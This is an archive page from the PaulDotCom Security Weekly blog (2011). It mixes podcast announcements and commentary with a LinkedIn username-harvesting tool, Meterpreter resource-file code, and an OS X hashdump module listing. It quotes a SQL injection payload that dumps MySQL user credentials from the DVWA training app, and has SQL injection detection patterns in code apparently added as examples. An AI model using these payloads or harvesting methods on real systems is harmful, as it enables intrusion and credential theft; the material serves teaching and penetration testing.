Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 236 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Georgia "Troublemaker" Weidman joins us to discuss her experiences at the Mid-Atlantic CCDC competition as both a blue team member and an incarcerated red team member. Then she discusses how her quest for a method of preventing embarrassing drunken texting led to her research into botnet control using SMS. Can you hear me now? I thought so...

Episode 235 Show Notes

Episode 235 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce

Audio Feeds:

Name That Employee with Gloodin0.1

gloodin 0.1 Released!

Posted by Dennis Antunes
@antunesdennis

gloodin quite simply uses unique search techniques to maximize the number of potential usernames that can be harvested from linkedin using google's cache and a given target organization name.
As automated crawling is contrary to google's TOS, this tool is provided for research purposes only. Using this could really tick off google and get you shunned. Please don't cry to me if this happens.

REQUIRES: python 2.x and the lxml package

USAGE: Simple:
./gloodin.py <target organization>
Results will be written to a number of files, most notably first_dot_last_<target_org> which presents the results in the only currently built-in format: firstname.lastname.
More formats to come: (first initial dot last; last dot first, etc). I hope to have command line switches to easily select the desired format with the option of appending email addresses as well shortly.

WHAT IT REALLY IS: gloodin is a python script that makes a large number of google queries along with the modifier "site:linkedin.com" to harvest thousands of potential employee names, going far beyond what a typical manual search would allow.
It achieves this by repeatedly searching for some very common first names, last names and titles, later stripping these out to grab all the rest. These names/terms are easily configurable by editing the included searchterms.txt, which is read in at run time.

WHY: To demonstrate how easy it is to harvest potential user names via social media, to underscore how important strong passwords are and to stress the overall need for two-factor authentication.

See http://securityjuggernaut.blogspot.com/2011/02/brute-forcing-passwords-part-2-with-and.html for more reasons to hate weak passwords.

TIPS: Some ways to improve the default searchterms.txt might be: add in the 10,20,30... most common Russian, Spanish, Portuguese, <insert language of choice> names; research the target organization and add in some of their common position names, etc.
Potential is limitless really. Just keep in mind you will eventually hit a limit as far as the query string is concerned. I've heard a 4K limit, but no one really knows for sure as google may impose their own as well. If you find out, please let me know... Again, this tool is for research purposes only. You risk getting shunned by google for using it. Do this inside of a corporate environment and you may also get punched in the face.

DISCLAIMER: The special sauce here is the approach to searching. I am not a coder by trade so admittedly, this code could be a whole lot better. Any suggestions for improvement would be greatly welcomed.

INSPIRATION: Heavily inspired by Reconnoiter: http://sourceforge.net/projects/reconnoiter/ Thank you Jason Wood!

LEFT TO DO: LOTS!!!
Support unicode
Break sections into functions:
  • Fetcher
  • Parser
  • Uniquer
  • Mangler
  • Spammer (email address appender) 
Command line switches for user name output format/separator --lf --fl --sep --all

All suggestions welcome!!!

Posted by Dennis Antunes
@antunesdennis
Mentoring the SANS Sec 542 in Foxboro, MA beginning 4/13/2011.
Before you register email me at stratmofo at gmail dot com for a special discount code!

Wow…

Another week and another major organization goes down. I am sure you have read the story about RSA being compromised.

If not, the gist of the story is here.

The question now becomes: What does this mean to my organization? There are a couple points that we have been hitting for the past few weeks. Number one is that traditional detection and reaction technologies are failing. Does this mean we need to throw them away and start over? No. What it means is there are limitations to these devices and technologies. There are a number of people who say that the penetration testing community is crap because all we do is break into systems and collect paychecks. Unfortunately, this is true for some of the organizations that are doing testing, but it is not indicative of our industry as a whole.

Rather, I propose this for looking at the state of penetration testing today. We are the structural engineers of the IT industry. Take a look at the building you are in right now. It does not matter if the building has Greek columns or second hand Steinways. It is a work of brilliance. The reason this brilliance is possible is because of the generations of testers that found the exact failure points of various materials such as wood, masonry and various forms of steel. In order to push the limits and build bigger and more resilient structures we need to know the limitations of the designs and the materials they use.

Today in IT there are a number of different forces that are trying to convince your organization that if you buy (DLP/AV/IPD/Firewall X) then your systems will be secure. This is total crap.


24-299coors-light-posters1.jpg

Paul made me put this in... I like Coors Light... A lot.

IT and especially Information Security is a dynamic endeavor. We need to make sure that different components interact with each other in such a way that a single compromise of one component does not lead to a total compromise of an organization. As penetration testers (if we are doing it correctly) we need to find the component, and more importantly the structural failures of organizations. For example, I think it is safe to assume that an attacker will compromise a user via social engineering. That is going to be a given for quite some time. However, is it a systematic problem for your entire organization? Can I successfully SE anyone in your company including the Systems Administrators? If so, this is a major component failing. Further, if I can compromise one system via social engineering can I compromise the rest of your organization? Can I remain persistent for weeks… If not months? This failing is unacceptable.

In short, if we built buildings like we design IT and security operations, there is a good chance that we would all still be living in one-story mud huts.

So, going forward, what can we do? First, test beyond initial exploitation. Second, test and train the human factor. Finally, train the Systems Administrators in your organization. These are the people that build and maintain the structural components of your organization. They need to know the limitations and failure points of the things they build. For too long organizations have worked to keep Systems Administration and Security separate. This is a flawed approach.

It is time to start moving beyond this. We are outgunned. The attackers have tremendous resources at their disposal. We need the help of the users and the IT staff to fully prepare for the threats we are facing.

Once again, I know we are going to get flamed by people saying their users are dumb, and that working with SAs is hopeless, and that because of these two "facts" there is no reason to better educate users and SAs.

This belief is wrong.

Just because something will fail does not mean it is worthless. It just means it has a failure point. Just like steel and wood. Put enough weight on it and it will break. The point is to design your architecture in such a way that one 2x4 or a truss failing does not lead to a catastrophic failure of an entire building. The same goes for IT.

John Strand

John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration Testers this April in Reston, VA, April 15 - 23.

OSSTMM Creator Peter Herzog is interviewed to share his thoughts and work in the security field... and all the way from across the pond.

Episode 235 Show Notes

Episode 235 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce

Audio Feeds:

Meterpreter Resource Files

|

Tonight while chatting via IRC with Egyp7 he mentioned that Meterpreter should have the capability of using resource files for cleanup in post exploitation and for automating tasks by users without the knowledge of Ruby and the Framework needed to write a Meterpreter script or Post module. He opened a ticket and assigned me the task. Here are the results.

I first opened the file lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb. This file has all the commands for the Meterpreter console, so the first thing was defining the resource command:

 def commands
         c = {
                 "?"          => "Help menu",
                 "background" => "Backgrounds the current session",
                 "close"      => "Closes a channel",
                 "channel"    => "Displays information about active channels",
                 "exit"       => "Terminate the meterpreter session",
                 "help"       => "Help menu",
                 "interact"   => "Interacts with a channel",
                 "irb"        => "Drop into irb scripting mode",
                 "migrate"    => "Migrate the server to another process",
                 "use"        => "Load one or more meterpreter extensions",
                 "quit"       => "Terminate the meterpreter session",
                 "resource"   => "Run the commands stored in a file",
                 "read"       => "Reads data from a channel",
                 "run"        => "Executes a meterpreter script or Post module",
                 "bgrun"      => "Executes a meterpreter script as a background thread",
                 "bgkill"     => "Kills a background meterpreter script",
                 "bglist"     => "Lists running background scripts",
                 "write"      => "Writes data to a channel",
         }
         # the console builds its help output and dispatch table from this hash;
         # "resource" is the new entry
         c
 end

Once this was done I added 2 methods, the first one for tab completion of the command:

 def cmd_resource_tabs(str, words)
         # only the first argument is completed, and it is completed as a filename
         return [] if words.length > 1

         tab_complete_filenames(str, words)
 end


Then the method that defines the command itself:

  1: def cmd_resource(*args)
  2:   if args.empty?
  3:     print(
  4:       "Usage: resource path1 path2\n" +
  5:       "Run the commands stored in the supplied files.\n")
  6:     return false
  7:   end
  8:   args.each do |glob|
  9:     files = ::Dir.glob(::File.expand_path(glob))
 10:     if files.empty?
 11:       print_error("No such file #{glob}")
 12:       next
 13:     end
 14:     files.each do |filename|
 15:       print_status("Reading #{filename}")
 16:       if (not ::File.readable?(filename))
 17:         print_error("Could not read file #{filename}")
 18:         next
 19:       else
 20:         ::File.open(filename, "r").each_line do |line|
 21:           next if line.strip.length < 1     # skip blank lines
 22:           next if line[0,1] == "#"          # skip comment lines
 23:           begin
 24:             print_status("Running #{line}")
 25:             client.console.run_single(line)  # run it as if typed at the console
 26:           rescue ::Exception => e
 27:             print_error("Error Running Command #{line}: #{e.class} #{e}")
 28:           end
 29: 
 30:         end
 31:       end
 32:     end
 33:   end
 34: end
 35: 

The first thing I do, on lines 1 to 7, is check whether an argument is given; if not, a help message is displayed and the method returns false. Next, on lines 8 to 13, I check that each argument actually matches a file; you can give it several files to process. Then from line 14 to the end of the method you will see that I check whether the file is readable, open it and use client.console.run_single() to run each command as if it were typed in the console. You will notice that on lines 21 and 22 I skip empty lines and commented lines, which allows you to comment your resource files.

To use it, simply issue the resource command followed by the file containing the commands. Here you can see an example run:

meterpreter > resource /tmp/cmd.rc
[*] Reading /tmp/cmd.rc
[*] Running sysinfo
System Language : en_US
OS              : Windows 7 (Build 7600).
Computer        : INFIDEL01
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32
[*] Running getuid
Server username: Infidel01\Carlos

The contents of the file are as follows:

loki:trunk cperez$ cat /tmp/cmd.rc
sysinfo
getuid
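As an added example (this is not Metasploit code), here is a stand-alone Ruby runner that applies the same three rules cmd_resource uses, so the skip and continue-on-error behaviour can be checked without a Meterpreter session: blank lines and lines starting with # are skipped, every other line is handed to a handler (a hypothetical hash of Procs standing in for client.console.run_single), and an exception from one command is reported while the rest of the file still runs. The sample resource file and the handler names are constructed for the example.

```ruby
# Added example, not Metasploit's cmd_resource: a minimal resource-file runner
# with the same parsing rules (skip blank lines, skip '#' comments, report an
# error for a failing command and keep going).
require 'tempfile'

class ResourceRunner
  attr_reader :log

  # handlers: Hash of command name => Proc taking the argument array.
  # The names are hypothetical stand-ins for console commands.
  def initialize(handlers)
    @handlers = handlers
    @log = []
  end

  # Run every command in the file at +path+; returns the number of commands
  # that executed successfully. Raises Errno::ENOENT if the file is missing.
  def run_file(path)
    ok = 0
    ::File.foreach(path) { |line| ok += 1 if run_line(line) }
    ok
  end

  # Apply the skip rules to one line; true on success, false if skipped or failed.
  def run_line(line)
    line = line.strip
    return false if line.empty?           # blank line
    return false if line.start_with?('#') # comment line
    name, *argv = line.split(/\s+/)
    handler = @handlers[name]
    if handler.nil?
      @log << "Unknown command #{name}"
      return false
    end
    begin
      @log << "Running #{line}"
      handler.call(argv)
      true
    rescue => e
      # one failing command must not abort the rest of the file
      @log << "Error Running Command #{line}: #{e.class} #{e}"
      false
    end
  end
end

# Constructed sample resource file: the two commands from /tmp/cmd.rc above,
# plus a comment, a blank line, an unknown command and a failing one.
SAMPLE_RC = <<~RC
  # collect basic host facts
  sysinfo

  getuid
  bogus
  fail now
RC

# Hypothetical handlers that only record that they ran.
def demo_handlers(out)
  {
    'sysinfo' => ->(_argv) { out << 'sysinfo ran' },
    'getuid'  => ->(_argv) { out << 'getuid ran' },
    'fail'    => ->(argv)  { raise ArgumentError, "bad args #{argv.inspect}" },
  }
end

# Write the sample to a temp file, run it, return [successes, handler output, log].
def demo
  out = []
  runner = ResourceRunner.new(demo_handlers(out))
  Tempfile.create('cmd.rc') do |f|
    f.write(SAMPLE_RC)
    f.flush
    ok = runner.run_file(f.path)
    [ok, out, runner.log]
  end
end

if $PROGRAM_NAME == __FILE__
  ok, _out, log = demo
  puts "#{ok} commands succeeded"
  puts log
end
```

Running the file prints the log in the same order cmd_resource would report it: two "Running" lines for the good commands, the unknown command, then the failing command and its error, with the runner reporting 2 successes.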

Join Us Live Tonight For PaulDotCom Security Weekly!

|

Paul, Larry and the gang will converge tonight to bring you their own special blend of "awesomesauce". Special guests include Peter Herzog, creator of the OSSTMM and Georgia Weidman talking smartphone botnets.

You can view the show live at 7:30PM EDT right here:

NOTE: The video will play the most recent show up until we are live!

Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 235 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Look! Another Adobe 0-Day!!!

|

So, here we are with another Adobe 0-day vulnerability. No! Wait! Stop! Don't go away from this page because you think it is a repeat from the past multitude of Adobe 0-days. This one is for Reader and… for Flash. See, that is something kind of new!

Anyway, why should you care? First, this exploit has been used on a "very small number of organizations and limited in scope." See? There is nothing to worry about...

[Image: john-wayne-gacy.jpg] Except for clowns.. We still need to fear clowns

But wait... There's more. The advisory goes on to say it has been used to "install persistent malware on the victim's machine." Okay, now is a good time to harken back to what we talked about yesterday. The threat landscape is no longer changing, folks; it has changed. As we have been hammering on the show for the past few months, traditional detection and prevention technologies are easily bypassed. Don't believe us? Go and talk to any competent pen testing company. Very rarely do AV and IDS/IPS get in the way. Further, if we think about current penetration tests, they are very limited in scope. We usually only have about a week or two, possibly a month, for most engagements. This means we are not spending a tremendous amount of time working on 0-days or taxing ourselves too hard to develop custom malware.

However, that being said, if you are a sufficiently large organization with adversaries that could make millions off of a compromise, you better believe they are going to spend the cash to purchase or develop 0-day or custom malware as part of their strategy to compromise you.

The reason I am jumping on this theme this week is because many of the organizations that hire pen testing companies want the absolute minimum: keep the cost and the scope down as much as possible. However, if you want this done right it is going to cost you in terms of time and money. Lately, at PaulDotCom we have found a number of our customers have opted to have things done the right way: solid recon, slow enumeration and scanning to stay under the detection wire, and very targeted attacks. Why? Almost all of our current customers that are looking for this type of test have one thing in common... They have been compromised. Getting a penetration test is now far more to them than a simple checkbox activity.

Going forward we are going to focus on three things at PaulDotCom. First, train your Systems Administrators. Second, keep an eye on the Pentesting standards group. And finally, start looking into Offensive Countermeasures. We will have an announcement on the Offensive Countermeasures angle here next week.

Stay tuned.

John Strand




It is fascinating how we are moving to a greater awareness in the security community that nation-state actors are actively developing and purchasing malware and exploits. Stuxnet was one of the first internationally recognized state malware specimens and it seems this trend is growing.

What does this mean to information security? Well, there are a couple of things that we have to get straight in our heads. First, traditional detection and prevention technologies are not going to work against this type of threat. We are talking about groups of people (i.e. nation states) that are putting a significant amount of time and resources into not only creating these programs, but doing robust reconnaissance on the target environments before launching their attacks. This should drastically change the way you architect your environment to deal with these threats. You should no longer be just worried about self-propagating worms. These were an annoyance and they were all the rage a few years ago. Granted, there is still a risk, but most likely self-propagating worms like Conficker will not bring your business or organization down. No, we should all be worried about attacks like Aurora, Stuxnet and things like FinFisher.

How do we best prepare? First, if you are a vendor and you are sending out emails about how your product "beat down Stuxnet" (we are looking at you CoreTrace) please stop. Just stop.

Look, we at PaulDotCom love Application Whitelisting products. We feel they are a class of product that every company should be looking at to get away from the traditional black list approach. However, when you say your product can “beat down” malware like Stuxnet and other highly targeted malware, you are not telling the whole story.

[Image: insane-clown-posse-006.jpg] That.. and we think you look like these guys.

Why? Well, I cannot help but think that if a nation state was targeting an organization and they were running something like CoreTrace, they would find a way to bypass it. That is the nature of the threat that many organizations are facing today. Highly targeted attacks using custom malware to bypass your existing security support structure.

If the FinFisher incident shows us anything, it is how much some nation states and organizations are willing to spend on custom malware. 287,000 euros is not chump change. By the way, that is about $393,000 USD.


[Image: cigars_make_interns_happy.jpg] Or, enough to cover the PDC Cigar/Sock fetish for about a month.

Moving forward we need to start looking at how we can baseline our networks, systems, and applications. Then we need to start watching for deviations from the norm. There is no shiny box or product that is going to "beat down" all malware and attacks for you. It is just like health. We all know what it takes to be healthy. It requires a good diet and exercise. But that is hard. We would much rather buy a pill, which never has worked. But, it looks easy, so we give it a try anyway. Maybe, just maybe this time it will work. It is the same with security. We know what we have to do: know your network, your systems, your applications, test, test and retest. Then, when you are done testing, do it some more then hire an organization to do a pentest for you that actually knows what they are doing. Then, start over again.

Sure it is hard… But if it was actually easy we would all be out of a job.

p.s. We have nothing against CoreTrace. Their product looks solid and whitelisting rocks. It is just that their marketing department insists on making the company look like tools.

-Larry and John Strand

Originally discussed during episode 234



PaulDotCom Security Weekly from the Mid-Atlantic Collegiate Cyber Defense Competition for 2011. Where they discuss cyber defense of cyber assets by being a cyber warrior to fight the cyber criminals and the cyber thieves. Then we have a cyber podcast where we discuss some cyber news about cyber events all over the cyber sphere. So join cyber Paul, cyber Larry, Cyber John, Cyber Carlos, and last and certainly not least Intern Cyber for this cyberific podcast.

[Image: cyber.jpeg]

Episode 234 Show Notes

Episode 234 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce

Audio Feeds:

Mid-Atlantic CCDC Competition & Talks Live!

|

You can tune into our live stream today, Friday March 11, 2011 and Saturday March 12, 2011 from 12PM through 9PM EST for information about the hacking competition, ZigBee badge hacking, and several talks:

NOTE: You can also visit PaulDotCom Live! and hang out in our IRC channel

Hey folks! Another great post from Dennis Antunes on blind SQL injection! In our previous post demonstrating Blind SQL Injection vulnerabilities in DVWA, we exploited the fact that user input is dynamically inserted into the SQL query, allowing us to dump and then later crack the password hashes in the dvwa database. Just as easily, we could have gone after all the users in the mysql database as well, including the root user....
1 union select user, password from mysql.user
...properly encoded would have sufficed.

Still, one would hope that root would choose a strong password, very difficult to crack.
Sadly, DVWA's default root password is blank, so obviously, no fun there...

So I took it upon myself to change root's password for him/her, to a very difficult (but still not impossible) password to crack.

In the following video, we will again exploit the SQL Injection vulnerabilities in DVWA this time with the help of Burp Repeater/Decoder. Using MySQL's load_file function, we'll browse through the application's source code until we ultimately uncover something very interesting...



Scary easy, isn't it? In an upcoming post, we'll use root's pilfered credentials to further establish our foothold, increasing our penetration of the application.

Posted by Dennis Antunes
@antunesdennis

Mentoring the SANS Sec 542 in Foxboro, MA beginning 4/13/2011.
Before you register email me at stratmofo at gmail dot com for a special discount code!
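From the defender's side, here is an added example that is not part of Dennis's post or of DVWA: a small Ruby scanner that reads web-server access-log lines, URL-decodes each query string (repeatedly, so double-encoded payloads normalise to the same form) and flags the indicators behind the technique shown above: UNION SELECT, load_file(), references to mysql.user or information_schema, a trailing SQL comment, and time-based functions. The log lines, IPs and paths are constructed for the example, and the indicator list goes a little beyond the post by also covering the double-encoded and time-based variants.

```ruby
# Added example (not DVWA or Metasploit code): flag SQL injection indicators
# in combined-format access-log lines after normalising the query string.
require 'uri'

# Indicator regexes, applied to the decoded, whitespace-normalised query string.
SQLI_INDICATORS = {
  union_select:   /\bunion\b(\s+all)?\s+select\b/i,
  load_file:      /\bload_file\s*\(/i,
  info_schema:    /\binformation_schema\b/i,
  mysql_user_tbl: /\bmysql\.user\b/i,
  comment_tail:   /(--|#|\/\*)\s*$/,
  time_based:     /\b(sleep|benchmark)\s*\(/i,
}.freeze

# "GET /path?query HTTP/1.1" as written by Apache/nginx combined log format.
REQUEST_RE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/

# Decode until nothing changes (bounded), so %2520 -> %20 -> space ends up in
# the same form as a plain space; then collapse whitespace.
def normalise_query(raw)
  s = raw.to_s
  5.times do
    begin
      d = URI.decode_www_form_component(s)
    rescue ArgumentError
      break # malformed %-sequence: keep what we have
    end
    break if d == s
    s = d
  end
  s.gsub(/\s+/, ' ').strip
end

# Returns nil when the line has no query string or no indicator matched,
# otherwise a Hash with client IP, path, decoded query and indicator names.
def scan_line(line)
  m = REQUEST_RE.match(line)
  return nil unless m
  path, _, query = m[1].partition('?')
  return nil if query.empty?
  decoded = normalise_query(query)
  hits = SQLI_INDICATORS.select { |_, re| decoded.match?(re) }.keys
  return nil if hits.empty?
  { ip: line[/\A(\S+)/, 1], path: path, query: decoded, indicators: hits }
end

def scan_log(text)
  text.each_line.map { |l| scan_line(l) }.compact
end

# Constructed sample log lines. Line 2 carries the UNION SELECT payload quoted
# in the post, URL-encoded; line 3 is a double-encoded load_file() attempt with
# a placeholder path; line 4 is a benign request that must not be flagged.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [10/Mar/2011:21:04:01 -0500] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321
  10.0.0.9 - - [10/Mar/2011:21:04:07 -0500] "GET /vulnerabilities/sqli_blind/?id=1%20union%20select%20user%2C%20password%20from%20mysql.user&Submit=Submit HTTP/1.1" 200 5120
  10.0.0.9 - - [10/Mar/2011:21:05:13 -0500] "GET /vulnerabilities/sqli_blind/?id=1%2520union%2520select%2520load_file%2528%2527%252Fsome%252Ffile%2527%2529%2523 HTTP/1.1" 200 900
  10.0.0.7 - - [10/Mar/2011:21:06:00 -0500] "GET /index.php?page=unionville HTTP/1.1" 200 300
LOG

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each do |r|
    puts "#{r[:ip]} #{r[:path]} #{r[:indicators].join(',')} :: #{r[:query]}"
  end
end
```

The word-boundary anchors matter: "unionville" in the last line is not reported, while both encoded payloads are, the second with the union_select, load_file and comment_tail indicators all firing on the decoded form.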

Fresh from their CCDC talks Paul and Larry will be recording tonight's Episode 234 live from the Mid-Atlantic CCDC competition!

Please note the time change - 7PM EST. Also, as a special treat, you can watch a live feed of the rest of the CCDC event tomorrow and Saturday as well. You can view the live feeds tonight, tomorrow and Saturday by watching the below video:

NOTE: The video will play the most recent show up until we are live!

Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 234 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

Assuming the recording gremlins are appeased, click the above links, and enjoy the show live!

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Your Firewall is Stupid

|

This is a great example of what it's like to be a firewall admin. Ah, the memories. People seem to think that a firewall is smart. I mean, it's a "security" device, right? So, if it sees something "bad" it will just block it, right? No, firewalls are in fact stupid. They just do what you tell them to do, nothing more, and nothing less. If you tell them to allow everything, they will do just that and open the floodgates. It's important that you, the human, put some context around each rule and be the intelligence. Firewalls are a tool, kind of like a hammer. Swing it at a window and it will break the window. Hit the nails the right way and you can build a house.

But still, at its core it is still a tool that is designed to allow traffic through. I was once talking with Marcus Ranum and he said the firewall was a beautiful thing before everyone shot a hole into it, right through port 80.

[Image: black-hat-t.jpg] But.. He promptly set it on fire.. So we're even. Right?

There are a few things that you want to consider when implementing and auditing a firewall. First, it is possible to have "rules" in it that are not displayed in the ruleset. For example, please check out ioscat and iosmap. Next, take a look at Implied Rulesets on Checkpoint firewalls.

The point is: yes, they are dumb, and yes, they do exactly what you tell them to.

Except when they don’t.

In God we trust… ‘til he builds a firewall, we'll audit all others.

[Image: wirecutters.jpg] God's Firewall!!! On sale now for $2.95 at your local hardware store

-PaulDotCom and John Strand

Originally discussed during episode 233


Ray Davidson takes ShmooCon to college. Larry continues on with his love for "The Sheen Machine".

Then a better suite of stories for the week are discussed.

Episode 233 Show Notes

Episode 233 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce

Audio Feeds:

A follow-up from last week. Yes, one of the ways to get malware on to a smartphone is the "store," which, as last week's article alluded, is infallible. Well, the Android marketplace just took down 50 rogue apps that were malicious, all published under fake developer names. That sounds like the allegedly infallible method just failed 100 times over. Why 100? 50 fake developers and 50 malicious apps, that weren't caught for some period of time. So how many people downloaded and used them? Well, probably more than the number on one hand, as stated last week. Looks like these apps were only after cloning your phone, but there is so much more that could happen here.

[Image: medium_cellphone-timebomb.jpg] You say this comes with unlimited data? That seems legit...

And remember the article we wrote about last week? Just remember according to the author we have nothing to worry about because it is not that bad yet. This kind of goes with a theme we are developing for the week. That is, we are making the same mistakes people. We need to do a bit more than wait for the security on mobile devices to blow up in our faces before we start to worry about it.

Get in front of the issues and start figuring how you are going to secure these devices in your enterprise now. Don’t wait until a 0-day pops all of your mobile devices.

Brought to you by: haxorthematrix and John Strand

Originally discussed during episode 233


Larry will be teaching SANS 617 Wireless Ethical Hacking, Penetration Testing, and Defenses May 9th - 14th in Victoria BC.

I really wish Darren was here for this one, but oh well. So, the speculation now is that the new Thunderbolt technology on the Macs is apparently connected directly to the PCIe bus. This means that a rogue device can be plugged in and would have unauthenticated access to anything else on the PCIe bus, including complete read access to memory and hard drives. Of course this isn't a big deal, as most of the Macs already have the same issues with FireWire, ExpressCard and SD ports. Intel does have a solution with VT-d, which allows the chipset to be configured so that devices on the PCIe bus don't have free rein. Unfortunately the chipset in the Mac doesn't support VT-d.

Additionally, ladies and gentlemen, boys and girls of all ages: making mistakes is okay. We know there are tight deadlines that you have to meet. But please try your absolute best to make new mistakes. Seriously, did the developers of this technology even look at the vulnerabilities in FireWire and USB? It is unacceptable if you look at your connectivity technology and it turns out that Bluetooth is more secure.

[Image: fail_headset_phone[2].jpg] Finally! A secure bluetooth headset!!

So, from the PDC crew to all of the developers who insist on making and remaking the same mistakes as others in the past:

[Image: bill-murray-you-suck.jpg]

Brought to you by: haxorthematrix and John Strand

Originally discussed during episode 233

Sharon Conheady on the history of social engineering, con-artistry, and the bamboozler. All this and more on an internless 233 part 1. I will be back next week and hope it sounds better.

FYI: Sharon has a beautiful voice!

Episode 233 Show Notes

Episode 233 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce

Audio Feeds:

iTunes multiple flaws

|

Now I probably wouldn't mention this one under normal circumstances, but it seems pretty epic to me. There are a handful of exploits here that can run arbitrary code as the current user. A handful all around a theme, if you ask me: loading images and XML. Guess what you might be using to listen to or download this podcast? Yeah, iTunes, which has loaded images and XML provided by us. Oh, and MitM attacks against the built-in WebKit that can trigger memory errors while browsing the iTunes store. I wonder if it carries over to other WebKit-enabled browsers....

Further, many people may think this is an unlikely attack surface. The idea is that you would have to get the attack onto the iTunes website. This is not necessarily true in all situations. For example, from the Metasploit de-cloak engine you can invoke iTunes. It could be very possible to leverage these attacks via an XSS attack to launch iTunes and compromise the target system simply because they thought they were going to listen to a new Justin Bieber song.

[Image: Death by Lost Boys.jpg] That's right... Death by Stereo!

Also, look very closely at the affected platforms. It impacts Windows and OS X systems. Watch this very closely folks. This is the future. It is no longer an issue that one OS is more secure than another. Applications like iTunes, Java and Flash are becoming ubiquitous across all platforms. On one hand it is nice that we have interoperability, however this reduction to an application level monoculture will have consequences.

Brought to you by: haxorthematrix and strandjs

Originally discussed during episode 233

Come join cosmonaut and world champion belly dancer Sharon Conheady for an overview of social engineering attacks used throughout the ages and then onwards to emerging social engineering techniques and trends.

[Image: SC_undercover_sm.jpg] Sharon "Undercover"

PaulDotCom Security Weekly also gets schooled, or rather, goes back to college with an old friend - Ray Davidson! Ray will go over his recent ShmooCon talk on providing wireless Internet connectivity to conference participants.

You can view the live feed tonight by watching the below video:

NOTE: The video will play the most recent show up until we are live!

Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 233 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

Put on your best running shoes, and enjoy the show live!

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, and John Strand.

Security is Frustrating

|

And this is why we drink. Dave explores the reasons why people do things like MAC address filtering and hiding their SSID instead of using strong passwords. We see this happen a lot in the corporate world too: people implement security that is easy, not what works. Seems to me that there needs to be a shift of focus. Let's focus on the hard stuff, like passwords, authentication, physical security, client security, and other stuff that I have probably told people they need to do. Yet, we keep marching down the Firewall/IDS/IPS/Anti-Virus route. Dave brings up two more great points: people think they don't have to defend against the best hackers in the world, yet the best hackers in the world create tools that people use. Secondly, he questions why we are doing things backwards, as in using simple passwords but implementing hidden SSIDs and MAC filtering.

Further, we see this repeated time and time again when we look at the reality of how humans think. Need to lose weight? Work out and eat less. Plain, simple and to the point. But that does not sell. Want to secure your network? Baseline your systems, monitor, drill and train. Then, drill and train again. Or, you could try to purchase another Bright Shiny Object (BSO, thanks Michelle) and hope, this time, it works.

As for your family. We need to start training them how to be more responsible. For adults this can be hard. However, for younger kids we can start to teach them what things to avoid.


[Image: van.jpg] What something to avoid might look like...

For example, don’t post crazy pictures of yourself on Facebook. Don’t post naked pictures online or keep them on your phone. How about no naked pictures at all? How about don’t click on links from strangers?

The reason I bring these things up in relation to the younger generations is because I believe there is hope for them. The rest of us, that have been here since before the Internet became a "thing," are set in our ways that were formulated when a gig hard-drive was massive.

Sure, this belief in the younger generations may be misplaced. But I will have faith anyway.

What is the worst that can happen?

[Image: fail-imminent-stairs.jpg]


-PaulDotCom and strandjs

Originally on episode 232.

Post Exploitation OS X Style!

|

Hello boys and girls!

Carlos was kind enough to share some of his brand new OS X post exploitation kung-fu during episode 232.

I know there are a lot of you that still like to believe that OS X does not really matter. However, it is finally getting a respectable market share of 10.9%. And, while it may be fun to bash on Apple from time to time, you will stop laughing when you need to exploit an OS X system and pull data from the target machine. Thankfully, Carlos has made the process of post exploitation far easier for all of us. For that we all owe him a beer or two. After all, the only thing Paul has done successfully with a Mac over the past few years from a post-exploitation perspective was pour beer in his Mac.

So, on to the good stuff.

In today's write-up we will cover 2 new enumeration modules against OS X machines that were added to Metasploit. These modules are:

- use post/osx/gather/enum_osx

- use post/osx/gather/hashdump

We will cover the shell commands used by the modules themselves. One of the advantages of post exploitation modules versus the typical Meterpreter script is that they can be written to be used against both shell and Meterpreter sessions. These initial OS X modules are written and tested for shell sessions, but many of the tasks are already written to work with Meterpreter once some issues with the Java Meterpreter are fixed.

Let's start with the OS X enumeration module. For the demo you will see that we have 2 shell sessions:


msf exploit(handler) > sessions

Active sessions
===============

  Id  Type       Information  Connection
  --  ----       -----------  ----------
  1   shell osx               192.168.1.100:4446 -> 192.168.1.100:54010
  2   shell osx               192.168.1.100:4446 -> 192.168.1.100:54013

